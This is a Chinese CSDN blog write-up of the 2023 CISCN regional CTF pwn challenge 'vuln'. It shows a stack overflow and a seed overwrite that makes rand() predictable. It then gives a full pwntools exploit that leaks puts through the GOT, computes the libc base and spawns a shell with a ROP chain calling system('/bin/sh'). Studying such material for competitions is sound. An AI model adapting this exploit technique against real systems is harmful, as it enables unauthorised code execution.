2023 ciscn 华东北分区赛 pwn vuln

最新推荐文章于 2024-06-20 18:00:11 发布
最新推荐文章于 2024-06-20 18:00:11 发布
阅读量342 收藏
点赞数 2
文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/131646604
版权

2023 ciscn 华东北分区赛 pwn vuln

溢出

ssize_t gift()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  return read(0, buf, 0x100uLL);
}

ret2libc

如下就可以实现python和c的联合编程

from ctypes import *
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

还有一个漏洞点如下,可以利用buf覆盖到seed

  int v4; // [rsp+8h] [rbp-18h] BYREF
  char buf[10]; // [rsp+Eh] [rbp-12h] BYREF
  int v6; // [rsp+18h] [rbp-8h]
  unsigned int seed; // [rsp+1Ch] [rbp-4h]
  puts("Welcome to this challenge~");
  puts("You need to guess 100 random numbers, if you can guess them all, you will be rewarded with a gift!");
  puts("Please enter your name:");
  read(0, buf, 0x12uLL);
  printf("hello,%s", buf);
  puts("Let's start!");
  srand(seed);

exp

from pwn import *
from ctypes import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './vuln'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

dbgg()
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r.sendafter('Please enter your name:\n', 'a' * 0xe + '\x00\x00\x00\x00')
seed = 0
libc.srand(seed)

for i in range(100):
    v6 = libc.rand() % 100 + 1
    r.sendafter('Guess the random number:\n', chr(v6))

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000401443
main_addr = 0x401287

p1 = b'a' * (0x30 + 8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter("You are talented, here's your gift!\n", p1)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('puts_addr = ' + hex(puts_addr))

lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = puts_addr - lb.sym['puts']
li('libc_base = ' + hex(libc_base))

one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = one[1] + libc_base
system_addr = libc_base + lb.sym['system']
bin_sh = libc_base + lb.search(b'/bin/sh').__next__()

r.sendafter('Please enter your name:\n', 'a' * 0xe + '\x00\x00\x00\x00')

ret = 0x000000000040101a
p2 = b'a' * (0x30 + 8) + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
r.sendline(p2)

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
安洵杯2023 部分pwn复现
臭nana的博客
06-26 1012
漏洞点:覆盖printf的返回地址。
ciscn 2022 东北分区赛pwn blue
z1r0的博客
07-02 752
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.17' not found 解决办法
热门推荐
rayylee
05-26 6万+
今天编译一个工程,在目标机上运行app,出现了这个错误。 下面我们由这条报错信息入手,寻找问题的答案: 1.首先保证程序没有被strip,也就是说可执行程序含有符号表信息。 2.出现这个问题的原因是glibc的版本太低,查看系统glibc支持的版本 root@ubuntu:/dvr# strings  /lib/x86_64-linux-gnu/libc.so.6 | gr
[转载]/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.17' not found 解决办法
wlzhang123的博客
07-13 1万+
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.17' not found 解决办法2017年10月11日 16:27:50阅读数:11252转载注明出处! https://blog.csdn.net/LEON1741/article/details/78205198今天在自己的Ubuntu 12.04(64位)系统上安装了一个QT_Creato...
2023 ciscn 东北分区赛 pwn cgi
z1r0的博客
07-10 457
模拟了一个http协议的交互。
ciscn 2022 东北分区赛pwn duck
z1r0的博客
06-30 1102
很遗憾的是当时比解出此题花了很长时间(换了m1的mac 环境还没装,到了比前一会想起来x86_64的题目肯定会多一些,所以就拿了一个全新版win10的tp,第一次体验到了在比的时候下载ubuntu,装vm和pwn的环境,导致浪费了很多时间。。。。) 这个pwn是2.34下的,一开始拿到这个题目的时候吓了一跳(当时是第二次做2.34的glibc pwn),以为要像house of emma那样,分析下来之后感谢出题人高抬贵手。 一个uaf漏洞,但是是2.34下的,2.34下禁用了free_hook,
ciscn 2022 东北分区赛pwn bigduck
z1r0的博客
07-01 705
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
CISCN 2020 Final Day2 pwn3思路分享 .pdf
09-05
CISCN 2020 Final Day2 pwn3思路分享》 本文主要探讨的是在CISCN 2020网络安全大第二天的pwn3挑战中的解题思路,涉及的是利用漏洞进行安全对抗的技术。该挑战的核心在于对二进制程序的深入理解和巧妙利用,以...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞
04-22
pwn题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞
04-22
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞
Python - 调用函数时检查参数的类型是否合规
MarkAdc的博客
06-20 503
函数运行时,参数类型不对,直接引发异常,有强语言那味了
Python开源大模型ChatTTS构建聊天机器人与语音识别系统的好选择
最新发布
thinkers
06-20 504
  
生命在于学习——Python人工智能原理(4.1)
易水哲的博客
06-19 1434
前言:人工智能基础结束了,本章开启Python的学习,之前我写过Python的学习了,不过是偏向网络安全方向的学习,这次算是完完全全的学习。
大模型基础——从零实现一个Transformer(5)
fan_fan_feng的专栏
06-18 426
上一篇文章已经把Encoder模块和Decoder模块都已经实现了,接下来来实现完整的Transformer。
使用python库moviepy完成视频剪辑
weixin_42739473的博客
06-17 408
d.修改 moviepy/config_defaults.py 中的IMAGEMAGICK_BINARY的值为本地magic.exe的绝对路径。c.安装moviepy,使用命令 pip install moviepy。,安装完成后设置环境变量。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn将是一场精彩的技术对决。作为网络安全领域的顶尖比之一,羊城杯吸引了来自全球各地的顶尖选手参与。比将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城杯pwn将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值